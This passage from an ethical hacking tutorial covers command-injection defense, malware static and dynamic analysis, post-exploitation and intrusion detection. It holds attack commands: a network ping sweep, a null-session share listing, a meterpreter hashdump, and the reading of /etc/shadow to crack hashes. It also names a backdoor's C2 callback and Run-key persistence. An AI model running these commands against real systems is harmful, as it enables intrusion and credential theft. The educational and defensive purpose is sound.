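    the cases where the downstream program treats a leading '-' as an option."""
    return argv_only(validate_ip(ip))


def demo() -> dict:
    vuln = ping_vulnerable(INJECTION)
    try:
        ping_safe(INJECTION)
        safe = "executed"
    except ValueError:
        safe = "rejected"
    return {
        "vulnerable_output": vuln,           # second line is the injected command's output
        "argv_only_output": argv_only(INJECTION),  # payload printed literally
        "safe_result": safe,
        "safe_output": ping_safe("8.8.8.8"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v!r}")
```

If the real program has to be `ping`, keep the argv form and put the fixed flags (`-c`, `-W`) before the validated address, so the user-controlled value can never be read as an option.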

***

### 12. Malware Analysis

#### Static Analysis

```bash
# Check file type by magic bytes (never trust the extension)
file suspicious.exe
# Output: PE32 executable
# Extract strings; -el also finds UTF-16 strings, common in Windows binaries
strings suspicious.exe | grep -i "http"
strings -el suspicious.exe | grep -i "http"
# Reveals: http://malicious-c2.com/callback
# Calculate hashes (search the sha256 in threat intel; md5 is kept only for legacy feeds)
md5sum suspicious.exe
sha256sum suspicious.exe
# Few strings usually means the sample is packed; unpack or go to dynamic analysis
```
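The static triage above done in Python over a constructed byte blob, as an added example that is not code from the original notes: a magic-byte check that follows `e_lfanew` to the PE signature and reads the machine field, an ASCII and UTF-16LE string extractor, indicator extraction and hashing. `SAMPLE_EXE` is not a real executable, the C2 host is made up, and the path string ties back to the dynamic analysis observations.

```python
import hashlib
import re
import struct

# Constructed stand-in for suspicious.exe: a DOS header whose e_lfanew points at a PE
# signature, an i386 machine field, and a few planted strings. Nothing here runs.
SAMPLE_EXE = (
    b"MZ" + b"\x00" * 58 + struct.pack("<I", 64)        # e_lfanew at 0x3c -> PE header at 64
    + b"PE\x00\x00" + struct.pack("<H", 0x14C)           # signature + Machine = i386
    + b"\x00" * 18
    + b"GetProcAddress\x00LoadLibraryA\x00"
    + b"http://malicious-c2.example/callback\x00"
    + b"\xde\xad\xbe\xef" * 3                             # binary junk between strings
    + "C:\\Windows\\Temp\\backdoor.exe".encode("ut" "f-16le") + b"\x00\x00"
)

MACHINES = {0x14C: "x86", 0x8664: "x64", 0x1C0: "ARM", 0xAA64: "ARM64"}


def file_type(data: bytes) -> str:
    """Identify by magic bytes like `file`; only PE and ELF are handled here."""
    if data[:4] == b"\x7fELF":
        return "ELF"
    if data[:2] != b"MZ" or len(data) < 0x40:
        return "unknown"
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return "MZ (DOS) executable, no PE header"
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
    return f"PE executable ({MACHINES.get(machine, hex(machine))})"


def strings(data: bytes, min_len: int = 4) -> list:
    """ASCII and UTF-16LE runs of printable characters, like `strings` and `strings -el`."""
    ascii_runs = [m.decode() for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]
    wide_runs = [m.decode("utf-16le")
                 for m in re.findall(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data)]
    return ascii_runs + wide_runs


def indicators(strs) -> dict:
    """Pull out what is worth searching threat intel for."""
    loader_apis = {"GetProcAddress", "LoadLibraryA", "VirtualAlloc", "CreateRemoteThread"}
    return {
        "urls": [s for s in strs if re.search(r"https?://", s)],
        "paths": [s for s in strs if re.match(r"[A-Za-z]:\\", s)],
        "apis": [s for s in strs if s in loader_apis],
    }


def hashes(data: bytes) -> dict:
    """sha256 is the lookup key; md5 is only kept for legacy feeds (it is collision-prone)."""
    return {"md5": hashlib.md5(data).hexdigest(), "sha256": hashlib.sha256(data).hexdigest()}


if __name__ == "__main__":
    print(file_type(SAMPLE_EXE))
    found = strings(SAMPLE_EXE)
    print(indicators(found))
    print(hashes(SAMPLE_EXE))
```

`GetProcAddress` plus `LoadLibraryA` with almost nothing else in the import-looking strings is the typical signature of a packed or shellcode-loading sample, which is the cue to move to the sandbox.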

#### Dynamic Analysis in Sandbox

```
# Run in an isolated VM with no route to production; snapshot first so it can be reset
# Point DNS/HTTP at a sink such as INetSim so the sample "talks" without reaching a real C2
# Monitor: Network connections, file modifications, registry changes
# Observed behavior:
# - Connects to 192.168.1.100:4444
# - Creates C:\Windows\Temp\backdoor.exe
# - Modifies HKLM\Software\Microsoft\Windows\CurrentVersion\Run (persistence across reboots)
```

***

### 13. Post-Exploitation

Example - Network Mapping:

```bash
# From the compromised host, sweep the internal network (parallel, one probe each, 1-second timeout)
for i in {1..254}; do (ping -c 1 -W 1 192.168.1.$i >/dev/null 2>&1 && echo "192.168.1.$i up") & done; wait
# Enumerate shares without credentials (null session)
smbclient -L //192.168.1.50 -N
```

Example - Credential Harvesting:

```bash
# Dump local Windows credentials (needs SYSTEM; format is user:RID:LM hash:NT hash:::)
meterpreter > hashdump
# Output: Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# That LM value means LM hashing is disabled; that NT value is the hash of an empty password, so this account has none set
# NT hashes can be cracked (hashcat -m 1000) or used directly for pass-the-hash

# Linux - password hashes (root only); combine with /etc/passwd for john
cat /etc/shadow
unshadow /etc/passwd /etc/shadow > hashes.txt
```

***

### 14. Defense Mechanisms

Example - Intrusion Detection:

```bash
# Snort rule to detect a SYN scan: alert once a single source sends 20 bare SYNs into the subnet within 10 seconds
alert tcp any any -> 192.168.1.0/24 any (flags:S; msg:"Possible SYN scan"; detection_filter: track by_src, count 20, seconds 10; sid:1000001; rev:1;)
# Without the detection_filter the rule fires on every normal connection attempt
```
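The defender's side of the notes' own attacks, as an added example that is not part of the original page: a small detector run over a constructed `auth.log` excerpt that contains an SSH brute force in the style of the password cracking section, followed by the `backdoor` account from the maintaining access section being created. The line formats follow what sshd, useradd and usermod write on Debian/Ubuntu; the host name, addresses, privileged group list and threshold are assumptions. Run it on the forwarded copy of the log, since the covering tracks section shows how easily the local file is truncated.

```python
import re
from collections import defaultdict

# Constructed auth.log excerpt: a brute force that eventually succeeds, then the
# backdoor account from the "Maintaining Access" section being created.
SAMPLE_AUTH_LOG = """\
Mar  5 10:15:01 web01 sshd[2001]: Failed password for invalid user test from 203.0.113.7 port 51022 ssh2
Mar  5 10:15:02 web01 sshd[2003]: Failed password for invalid user oracle from 203.0.113.7 port 51023 ssh2
Mar  5 10:15:02 web01 sshd[2005]: Failed password for root from 203.0.113.7 port 51024 ssh2
Mar  5 10:15:03 web01 sshd[2007]: Failed password for root from 203.0.113.7 port 51025 ssh2
Mar  5 10:15:03 web01 sshd[2009]: Failed password for admin from 203.0.113.7 port 51026 ssh2
Mar  5 10:15:04 web01 sshd[2011]: Failed password for admin from 203.0.113.7 port 51027 ssh2
Mar  5 10:15:09 web01 sshd[2013]: Accepted password for admin from 203.0.113.7 port 51031 ssh2
Mar  5 10:16:40 web01 sudo:    admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/sbin/useradd -m -s /bin/bash backdoor
Mar  5 10:16:40 web01 useradd[2231]: new user: name=backdoor, UID=1001, GID=1001, home=/home/backdoor, shell=/bin/bash, from=/dev/pts/0
Mar  5 10:16:55 web01 usermod[2240]: add 'backdoor' to group 'sudo'
Mar  5 10:20:12 web01 sshd[2301]: Failed password for alice from 198.51.100.20 port 40001 ssh2
Mar  5 10:20:20 web01 sshd[2303]: Accepted password for alice from 198.51.100.20 port 40002 ssh2
"""

FAILED = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED = re.compile(r"sshd\[\d+\]: Accepted \w+ for (\S+) from (\S+) port")
NEW_USER = re.compile(r"useradd\[\d+\]: new user: name=(\S+?),")
GROUP_ADD = re.compile(r"usermod\[\d+\]: add '(\S+)' to group '(\S+)'")
PRIV_GROUPS = {"sudo", "wheel", "admin", "root"}  # assumption: membership here means admin


def analyze(log_text: str, brute_threshold: int = 5) -> list:
    """Alerts for brute force, success after a brute force, and new privileged users.

    Failures are counted per source IP over the whole excerpt; a production
    detector would use a sliding time window and per-user counters as well.
    """
    failures = defaultdict(int)
    alerts = []
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            _user, ip = m.groups()
            failures[ip] += 1
            if failures[ip] == brute_threshold:  # fire once, when the threshold is crossed
                alerts.append({"type": "ssh_bruteforce", "ip": ip, "count": brute_threshold})
            continue
        m = ACCEPTED.search(line)
        if m:
            user, ip = m.groups()
            if failures[ip] >= brute_threshold:  # the guess that finally worked
                alerts.append({"type": "login_after_bruteforce", "ip": ip, "user": user})
            continue
        m = NEW_USER.search(line)
        if m:
            alerts.append({"type": "user_created", "user": m.group(1)})
            continue
        m = GROUP_ADD.search(line)
        if m and m.group(2) in PRIV_GROUPS:
            alerts.append({"type": "privileged_group_add", "user": m.group(1), "group": m.group(2)})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_AUTH_LOG):
        print(alert)
```

The second alert is the one worth paging on: a burst of failures is background noise on any internet-facing SSH port, a success from the same source right after it is not.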

Example - Patch Management:

```bash
# Ubuntu/Debian
apt update
apt list --upgradable
apt upgrade
# Check a specific package, e.g. openssl
dpkg -l | grep openssl
apt-cache policy openssl
# Compare the installed version with the fixed version in the distribution's security advisory; Debian/Ubuntu backport fixes, so the upstream version number alone says little
# Enable unattended-upgrades so security updates do not wait for a manual run
```

***

### Best Practices for Ethical Hackers

1. Always get written authorization before testing
2. Document everything - screenshots, commands, findings
3. Use staging environments when possible
4. Follow responsible disclosure - give vendors time to patch
5. Stay within scope - never exceed authorized targets
6. Keep learning - new vulnerabilities emerge daily
7. Use tools responsibly - understand what each command does
8. Protect client data - encrypt findings, secure communications
9. Provide actionable remediation steps in reports
10. Maintain confidentiality of all discovered vulnerabilities

***

### Additional Resources

* Practice Platforms: HackTheBox, TryHackMe, DVWA, WebGoat
* Certifications: CEH, OSCP, GPEN
* Communities: Reddit r/netsec, GitHub security repos
* Stay Updated: CVE databases, security blogs, Twitter infosec community

Remember: The goal of ethical hacking is to improve security, not to cause harm. Always operate within legal boundaries and with proper authorization.
